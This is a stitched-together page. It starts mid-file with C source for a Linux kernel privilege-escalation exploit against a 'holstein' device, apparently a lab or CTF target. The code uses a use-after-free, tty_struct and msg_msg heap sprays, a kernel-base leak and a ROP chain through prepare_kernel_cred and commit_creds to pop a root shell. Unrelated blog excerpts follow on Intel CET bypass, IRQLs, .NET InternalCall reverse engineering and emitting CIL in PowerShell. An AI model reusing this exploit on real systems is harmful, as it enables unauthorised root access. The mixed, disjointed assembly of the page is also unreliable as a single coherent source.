        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);
}

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");
    }

    msg_queue[num_queue] = msg_qid;
    num_queue++;
}

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");
    }

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/ 

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;
    }

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;
    }

    // I think the pointers should be different as well
    if (next == prev) {
        return false;
    }

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    
    return true;
}

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");
    save_state();

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open(DEV, O_RDWR);
    close(fd1);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        close(open_ptmx[i]);
        open_ptmx[i] = 0;
    }
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");
    solve_gadgets();

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);
    close(fd3);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        init_msg_q();
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();
        }

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
            break;
        }
        
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    }
    
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);
    close(fd5);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    overwrite_ops(fd6);
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
    }

    return 0;
}

Bypassing Intel CET with Counterfeit Objects

22 September 2022 at 00:00
Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.

IRQLs Close Encounters of the Rootkit Kind

3 January 2022 at 00:00
IRQL Overview Present since the early stages of Windows NT, an Interrupt Request Level (IRQL) defines the current hardware priority at which a CPU runs at any given time. On a multi-processor architecture, each CPU can hold a different and independent IRQL value, which is stored inside the CR8register. We should keep this in mind as we are going to build our lab examples on a quad-core system. Every hardware interrupt is mapped to a specific request level as depicted below.

Reverse Engineering InternalCall Methods in .NET

16 November 2013 at 19:52
Often times, when attempting to reverse engineer a particular .NET method, I will hit a wall because I’ll dig in far enough into the method’s implementation that I’ll reach a private method marked [MethodImpl(MethodImplOptions.InternalCall)]. For example, I was interested in seeing how the .NET framework loads PE files in memory via a byte array using the System.Reflection.Assembly.Load(Byte[]) method. When viewed in ILSpy (my favorite .NET decompiler), it will show the following implementation:
 
 
So the first thing it does is check to see if you’re allowed to load a PE image in the first place via the CheckLoadByteArraySupported method. Basically, if the executing assembly is a tile app, then you will not be allowed to load a PE file as a byte array. It then calls the RuntimeAssembly.nLoadImage method. If you click on this method in ILSpy, you will be disappointed to find that there does not appear to be a managed implementation.
 
 
As you can see, all you get is a method signature and an InternalCall property. To begin to understand how we might be able reverse engineer this method, we need to know the definition of InternalCall. According to MSDN documentation, InternalCall refers to a method call that “is internal, that is, it calls a method that is implemented within the common language runtime.” So it would seem likely that this method is implemented as a native function in clr.dll. To validate my assumption, let’s use Windbg with sos.dll – the managed code debugger extension. My goal using Windbg will be to determine the native pointer for the nLoadImage method and see if it jumps to its respective native function in clr.dll. I will attach Windbg to PowerShell since PowerShell will make it easy to get the information needed by the SOS debugger extension. The first thing I need to do is get the metadata token for the nLoadImage method. This will be used in Windbg to resolve the method.
 
 
As you can see, the Get-ILDisassembly function in PowerSploit conveniently provides the metadata token for the nLoadImage method. Now on to Windbg for further analysis…
 
 
The following commands were executed:
 
1) .loadby sos clr
 
Load the SOS debugging extension from the directory that clr.dll is loaded from
 
2) !Token2EE mscorlib.dll 0x0600278C
 
Retrieves the MethodDesc of the nLoadImage method. The first argument (mscorlib.dll) is the module that implements the nLoadImage method and the hex number is the metadata token retrieved from PowerShell.
 
3) !DumpMD 0x634381b0
 
I then dump information about the MethodDesc. This will give the address of the method table for the object that implements nLoadImage
 
4) !DumpMT -MD 0x636e42fc
 
This will dump all of the methods for the System.Reflection.RuntimeAssembly class with their respective native entry point. nLoadImage has the following entry:
 
635910a0 634381b0   NONE System.Reflection.RuntimeAssembly.nLoadImage(Byte[], Byte[], System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef, Boolean, System.Security.SecurityContextSource)
 
So the native address for nLoadImage is 0x635910a0. Now, set a breakpoint on that address, let the program continue execution and use PowerShell to call the Load method on a bogus PE byte array.
 
PS C:\> [Reflection.Assembly]::Load(([Byte[]]@(1,2,3)))
 
You’ll then hit your breakpoint in WIndbg and if you disassemble from where you landed, the function that implements the nLoadImage method will be crystal clear – clr!AssemblyNative::LoadImage
 
 
You can now use IDA for further analysis and begin digging into the actual implementation of this InternalCall method!
 
 
After digging into some of the InternalCall methods in IDA you’ll quickly see that most functions use the fastcall convention. In x86, this means that a static function will pass its first two arguments via ECX and EDX. If it’s an instance function, the ‘this’ pointer will be passed via ECX (as is standard in thiscall) and its first argument via EDX. Any remaining arguments are pushed onto the stack.
 
So for the handful of people that have wondered where the implementation for an InternalCall method lies, I hope this post has been helpful.

Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates

2 October 2013 at 00:09
tl:dr version

It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.



I’ll admit, I have a love/hate relationship with PowerShell. I love that it is the most powerful scripting language and shell but at the same time, I often find quirks in the language that consistently bother me. One such quirk is the fact that integers don’t wrap when they overflow. Rather, they saturate – they are cast into the next largest type that can accommodate them. To demonstrate what I mean, observe the following:


You’ll notice that [Int16]::MaxValue (i.e. 0x7FFF) understandably remains an Int16. However, rather than wrapping when adding one, it is upcast to an Int32. Admittedly, this is probably the behavior that most PowerShell users would desire. I, on the other hand wish I had the option to perform math on integers that wrapped. To solve this, I originally thought that I would have to write an addition function using complicated binary logic. I opted not to go that route and decided to assemble a function using raw CIL (common intermediate language) opcodes. What follows is a brief explanation of how to accomplish this task.


Common Intermediate Language Basics

CIL is the bytecode that describes .NET methods. A description of all the opcodes implemented by Microsoft can be found here. Every time you call a method in .NET, the runtime either interprets its opcodes or it executes the assembly language equivalent of those opcodes (as a result of the JIT process - just-in-time compilation). The calling convention for CIL is loosely related to how calls are made in X86 assembly – arguments are pushed onto a stack, a method is called, and a return value is returned to the caller.

Since we’re on the subject of addition, here are the CIL opcodes that would add two numbers of similar type together and would wrap in the case of an overflow:

IL_0000: Ldarg_0 // Loads the argument at index 0 onto the evaluation stack.
IL_0001: Ldarg_1 // Loads the argument at index 1 onto the evaluation stack.
IL_0002: Add // Adds two values and pushes the result onto the evaluation stack.
IL_0003: Ret // Returns from the current method, pushing a return value (if present) from the callee's evaluation stack onto the caller's evaluation stack.

Per Microsoft documentation, “integer addition wraps, rather than saturates” when using the Add instruction. This is the behavior I was after in the first place. Now let’s learn how to build a method in PowerShell that uses these opcodes.


Dynamic Methods

In the System.Reflection.Emit namespace, there is a DynamicMethod class that allows you to create methods without having to first go through the steps of creating an assembly and module. This is nice when you want a quick and dirty way to assemble and execute CIL opcodes. When creating a DynamicMethod object, you will need to provide the following arguments to its constructor:

1) The name of the method you want to create
2) The return type of the method
3) An array of types that will serve as the parameters

The following PowerShell command will satisfy those requirements for an addition function:

$MethodInfo = New-Object Reflection.Emit.DynamicMethod('UInt32Add', [UInt32], @([UInt32], [UInt32]))

Here, I am creating an empty method that will take two UInt32 variables as arguments and return a UInt32.

Next, I will actually implement the logic of the method my emitting the CIL opcodes into the method:

$ILGen = $MethodInfo.GetILGenerator()
$ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
$ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
$ILGen.Emit([Reflection.Emit.OpCodes]::Add)
$ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

Now that the logic of the method is complete, I need to create a delegate from the $MethodInfo object. Before this can happen, I need to create a delegate in PowerShell that matches the method signature for the UInt32Add method. This can be accomplished by creating a generic Func delegate with the following convoluted syntax:

$Delegate = [Func``3[UInt32, UInt32, UInt32]]

The previous command states that I want to create a delegate for a function that accepts two UInt32 arguments and returns a UInt32. Note that the Func delegate wasn't introduced until .NET 3.5 which means that this technique will only work in PowerShell 3+. With that, we can now bind the method to the delegate:

$UInt32Add = $MethodInfo.CreateDelegate($Delegate)

And now, all we have to do is call the Invoke method to perform normal integer math that wraps upon an overflow:

$UInt32Add.Invoke([UInt32]::MaxValue, 2)

Here is the code in its entirety:


For additional information regarding the techniques I described, I encourage you to read the following articles:

Introduction to IL Assembly Language
Reflection Emit Dynamic Method Scenarios
How to: Define and Execute Dynamic Methods

❌
❌